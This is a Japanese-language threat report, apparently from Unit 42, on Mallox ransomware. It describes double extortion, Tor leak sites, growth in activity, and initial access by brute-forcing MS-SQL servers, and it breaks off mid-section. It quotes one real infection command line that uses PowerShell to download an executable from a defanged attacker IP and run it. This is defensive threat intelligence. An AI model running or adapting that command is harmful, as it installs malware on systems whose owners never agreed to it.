{"id":129319,"date":"2023-07-20T19:16:47","date_gmt":"2023-07-21T02:16:47","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=129319"},"modified":"2024-07-30T18:03:52","modified_gmt":"2024-07-31T01:03:52","slug":"mallox-ransomware","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/","title":{"rendered":"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2"},"content":{"rendered":"

<\/a>\u6982\u8981<\/h2>\n

Mallox (\u5225\u540d TargetCompany\u3001FARGO\u3001Tohnichi) \u306f\u3001Microsoft Windows \u30b7\u30b9\u30c6\u30e0\u3092\u6a19\u7684\u3068\u3059\u308b\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30d5\u30a1\u30df\u30ea\u30fc\u3067\u3059\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f 2021 \u5e74 6 \u6708\u304b\u3089\u6d3b\u52d5\u3057\u3066\u304a\u308a\u3001\u5b89\u5168\u3067\u306a\u3044 MS-SQL \u30b5\u30fc\u30d0\u30fc\u3092\u4fb5\u5165\u30d9\u30af\u30c8\u30eb\u3068\u3057\u3066\u60aa\u7528\u3057\u3001\u88ab\u5bb3\u8005\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u3092\u4fb5\u5bb3\u3059\u308b\u3053\u3068\u3067\u77e5\u3089\u308c\u307e\u3059\u3002<\/p>\n

Unit 42 \u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u6700\u8fd1\u3001MS-SQL \u30b5\u30fc\u30d0\u30fc\u3092\u60aa\u7528\u3057\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u914d\u5e03\u3059\u308b Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u5897\u52a0 (\u524d\u5e74\u6bd4\u3067\u307b\u307c 174%) \u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002Unit 42 \u306e\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u5bfe\u5fdc\u8005\u306f\u3001Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304c\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u3001\u30c7\u30fc\u30bf\u6f0f\u51fa\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30b9\u30ad\u30e3\u30ca\u30fc\u306a\u3069\u306e\u30c4\u30fc\u30eb\u3092\u4f7f\u3063\u3066\u3044\u308b\u3088\u3046\u3059\u3092\u89b3\u6e2c\u3057\u3066\u3044\u307e\u3059\u3002\u3055\u3089\u306b\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u306e\u62e1\u5927\u306b\u4e57\u308a\u51fa\u3057\u3066\u304a\u308a\u3001\u30cf\u30c3\u30ad\u30f3\u30b0 \u30d5\u30a9\u30fc\u30e9\u30e0\u3067\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u3092\u52df\u96c6\u3057\u3066\u3044\u308b\u3068\u3044\u3046\u30a4\u30f3\u30b8\u30b1\u30fc\u30bf\u30fc (\u6307\u6a19) \u3082\u78ba\u8a8d\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n

\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001Cortex XDR<\/a>\u306e\u63d0\u4f9b\u3059\u308b Behavioral Threat Protection \u3084 Exploit Protection \u3092\u542b\u3080\u591a\u5c64\u9632\u5fa1\u3092\u901a\u3058\u3001\u672c\u7a3f\u3067\u53d6\u308a\u4e0a\u3052\u305f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304a\u3088\u3073\u305d\u306e\u6280\u8853\u304b\u3089\u306e\u4fdd\u8b77\u3092\u53d7\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n


\nhttps:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/mallox_video_prevent_detect_final.mp4<\/a><\/video><\/div>\n

Cortex \u304c Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u3092\u963b\u6b62\u3059\u308b\u3088\u3046\u3059\u3092\u89e3\u8aac\u3057\u305f\u30d3\u30c7\u30aa<\/span><\/em><\/span><\/p>\n

\u30af\u30e9\u30a6\u30c9\u914d\u4fe1\u578b\u30de\u30eb\u30a6\u30a7\u30a2\u89e3\u6790\u30b5\u30fc\u30d3\u30b9 Advanced WildFire<\/a> \u306f Mallox \u306b\u95a2\u9023\u3059\u308b\u30b5\u30f3\u30d7\u30eb\u3092\u300c\u60aa\u610f\u306e\u3042\u308b\u3082\u306e (malicious)\u300d\u3068\u3057\u3066\u6b63\u78ba\u306b\u8b58\u5225\u3057\u307e\u3059\u3002Advanced URL Filtering<\/a>\u3001DNS Security<\/a>\u3092\u542b\u3080\u30af\u30e9\u30a6\u30c9\u914d\u4fe1\u578b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30b5\u30fc\u30d3\u30b9<\/a>\u306f\u3001\u540c\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u3092\u300c\u60aa\u610f\u306e\u3042\u308b\u3082\u306e (malicious)\u300d\u3068\u3057\u3066\u8b58\u5225\u3057\u307e\u3059\u3002<\/p>\n

\u4fb5\u5bb3\u306e\u61f8\u5ff5\u304c\u3042\u308a\u5f0a\u793e\u306b\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u30ec\u30b9\u30dd\u30f3\u30b9\u306b\u95a2\u3059\u308b\u3054\u76f8\u8ac7\u3092\u306a\u3055\u308a\u305f\u3044\u5834\u5408\u306f\u3001\u3053\u3061\u3089\u306e\u30d5\u30a9\u30fc\u30e0<\/a>\u304b\u3089\u304a\u554f\u3044\u5408\u308f\u305b\u304f\u3060\u3055\u3044 (\u3054\u76f8\u8ac7\u306f\u5f0a\u793e\u88fd\u54c1\u306e\u304a\u5ba2\u69d8\u306b\u306f\u9650\u5b9a\u3055\u308c\u307e\u305b\u3093)\u3002<\/p>\n\n\n\n
\u95a2\u9023\u3059\u308bUnit 42\u306e\u30c8\u30d4\u30c3\u30af<\/b><\/td>\nRansomware<\/b><\/a><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n

<\/a>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u6982\u8981<\/h2>\n

Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306f\u3001\u4ed6\u306e\u591a\u304f\u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u3068\u540c\u69d8\u306b\u3001\u6d41\u884c\u308a\u306e\u4e8c\u91cd\u6050\u559d<\/a>\u3092\u884c\u3044\u307e\u3059\u3002\u7d44\u7e54\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u6697\u53f7\u5316\u3059\u308b\u524d\u306b\u30c7\u30fc\u30bf\u3092\u76d7\u307f\u3001\u300c\u76d7\u3093\u3060\u30c7\u30fc\u30bf\u3092\u30ea\u30fc\u30af\u30b5\u30a4\u30c8\u3067\u516c\u958b\u3059\u308b\u300d\u3068\u8105\u3059\u3053\u3068\u3067\u3001\u88ab\u5bb3\u8005\u306b\u8eab\u4ee3\u91d1\u3092\u652f\u6255\u308f\u305b\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/p>\n

\u4e0b\u306e\u56f3 1 \u306f\u3001Tor \u30d6\u30e9\u30a6\u30b6\u30fc\u4e0a\u306e Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 Web \u30b5\u30a4\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u7d44\u7e54\u306e\u540d\u524d\u3068\u30ed\u30b4\u306f\u4f0f\u305b\u3066\u3042\u308a\u307e\u3059\u304c\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u3053\u3046\u3044\u3046\u3084\u308a\u304b\u305f\u3067\u6a19\u7684\u304b\u3089\u6f0f\u3048\u3044\u3057\u305f\u30c7\u30fc\u30bf\u3092\u8868\u793a\u3057\u307e\u3059\u3002<\/p>\n

\"\u753b\u50cf
\u56f31. Tor \u30d6\u30e9\u30a6\u30b6\u30fc\u4e0a\u306e Mallox Web \u30b5\u30a4\u30c8<\/figcaption><\/figure>\n

\u5404\u88ab\u5bb3\u8005\u306b\u306f\u79d8\u5bc6\u9375\u304c\u4e0e\u3048\u3089\u308c\u3001\u3053\u306e\u79d8\u5bc6\u9375\u3092\u4f7f\u3063\u3066\u540c\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u5bfe\u8a71\u3084\u6761\u4ef6\u3084\u652f\u6255\u3044\u306e\u4ea4\u6e09\u3092\u884c\u3044\u307e\u3059\u3002\u4ee5\u4e0b\u306e\u56f3 2 \u306f\u540c\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u901a\u4fe1\u306b\u4f7f\u308f\u308c\u308b\u30c1\u30e3\u30c3\u30c8\u3067\u3059\u3002<\/p>\n

\"\u753b\u50cf
\u56f32. Mallox \u306e\u30d7\u30e9\u30a4\u30d9\u30fc\u30c8\u30c1\u30e3\u30c3\u30c8\u7528\u306e Tor \u30b5\u30a4\u30c8<\/figcaption><\/figure>\n

Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30b0\u30eb\u30fc\u30d7\u306f\u88ab\u5bb3\u8005\u304c\u4f55\u767e\u4eba\u3082\u3044\u308b\u3068\u4e3b\u5f35<\/a>\u3057\u3066\u3044\u307e\u3059\u3002\u5b9f\u969b\u306e\u88ab\u5bb3\u8005\u306e\u6570\u306f\u308f\u304b\u3089\u306a\u3044\u307e\u307e\u3067\u3059\u304c\u3001\u5f0a\u793e\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u30fc\u306f\u3001\u88fd\u9020\u3001\u5c02\u9580\u30b5\u30fc\u30d3\u30b9\u304a\u3088\u3073\u6cd5\u5f8b\u30b5\u30fc\u30d3\u30b9\u3001\u5378\u58f2\u304a\u3088\u3073\u5c0f\u58f2\u3092\u542b\u3080\u8907\u6570\u306e\u696d\u754c\u3092\u307e\u305f\u304e\u3001\u4e16\u754c\u4e2d\u3067\u6570\u5341\u4eba\u306e\u6f5c\u5728\u7684\u88ab\u5bb3\u8005\u304c\u3044\u308b\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n

2023 \u5e74\u306e\u521d\u3081\u4ee5\u6765\u3001Mallox \u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306f\u5b89\u5b9a\u7684\u306b\u5897\u52a0\u3057\u3066\u3044\u307e\u3059\u3002\u5f0a\u793e\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u30fc\u3068\u30aa\u30fc\u30d7\u30f3\u8105\u5a01\u60c5\u5831\u6e90\u304b\u3089\u53ce\u96c6\u3057\u305f\u30c7\u30fc\u30bf\u306b\u3088\u308b\u3068\u30012023 \u5e74\u306b\u306f\u30012022 \u5e74\u5f8c\u534a\u3068\u6bd4\u8f03\u3057\u3066 Mallox \u306e\u653b\u6483\u304c\u7d04 174% \u5897\u52a0\u3057\u3066\u3044\u307e\u3057\u305f (\u56f3 3 \u53c2\u7167)\u3002<\/p>\n

\"\u753b\u50cf
\u56f33. \u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u30fc\u306b\u57fa\u3065\u304f Mallox \u306e\u653b\u6483\u8a66\u884c\u6570\u306e\u63a8\u79fb (2022 \u5e74\u5f8c\u534a \u301c 2023 \u5e74\u524d\u534a)<\/figcaption><\/figure>\n

<\/a>\u521d\u671f\u30a2\u30af\u30bb\u30b9<\/h2>\n

2021 \u5e74\u306e\u51fa\u73fe\u4ee5\u6765\u3001Mallox \u30b0\u30eb\u30fc\u30d7\u306f\u305a\u3063\u3068\u540c\u3058\u65b9\u6cd5\u3067\u521d\u671f\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3066\u3044\u307e\u3059\u3002\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3067\u4fdd\u8b77\u3055\u308c\u3066\u3044\u306a\u3044 MS-SQL \u30b5\u30fc\u30d0\u30fc\u3092\u72d9\u3044\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306b\u4fb5\u5165\u3059\u308b\u3068\u3044\u3046\u65b9\u6cd5\u3067\u3059\u3002\u653b\u6483\u306f\u8f9e\u66f8\u306e\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u653b\u6483\u304b\u3089\u59cb\u307e\u308a\u3001MS-SQL \u30b5\u30fc\u30d0\u30fc\u306b\u65e2\u77e5\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u3084\u3088\u304f\u4f7f\u308f\u308c\u3066\u3044\u308b\u30d1\u30b9\u30ef\u30fc\u30c9\u306e\u30ea\u30b9\u30c8\u3092\u8a66\u3057\u307e\u3059\u3002\u30a2\u30af\u30bb\u30b9\u53d6\u5f97\u5f8c\u306f\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u3068 PowerShell \u3092\u4f7f\u3063\u3066\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u30fc\u304b\u3089 Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059 (\u56f3 4 \u53c2\u7167)\u3002<\/p>\n

\"\u753b\u50cf
\u56f34. Cortex XDR \/ XSIAM \u304c Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306b\u3088\u308b\u8f9e\u66f8\u578b\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u653b\u6483\u306b\u53cd\u5fdc\u3057\u3066\u751f\u6210\u3057\u305f\u30a2\u30e9\u30fc\u30c8\u306e\u4f8b<\/figcaption><\/figure>\n

Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304c\u611f\u67d3\u306b\u4f7f\u3046\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u306e\u4f8b\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3059\u3002<\/p>\n

<\/p>\n

\"\\\"C:\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\" \/C echo $cl = New-Object System.Net.WebClient > C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 & echo $cl.DownloadFile(\\\"hxxp:\/\/80.66.75[.]36\/aRX.exe\\\", \\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\") >> %TEMP%\\\\updt.ps1 & powershell -ExecutionPolicy Bypass C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 & WMIC process call create \\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\"\"<\/pre>\n
<\/p>\n
\u3053\u306e\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u306f\u6b21\u306e\u3053\u3068\u3092\u884c\u3044\u307e\u3059\u3002<\/p>\n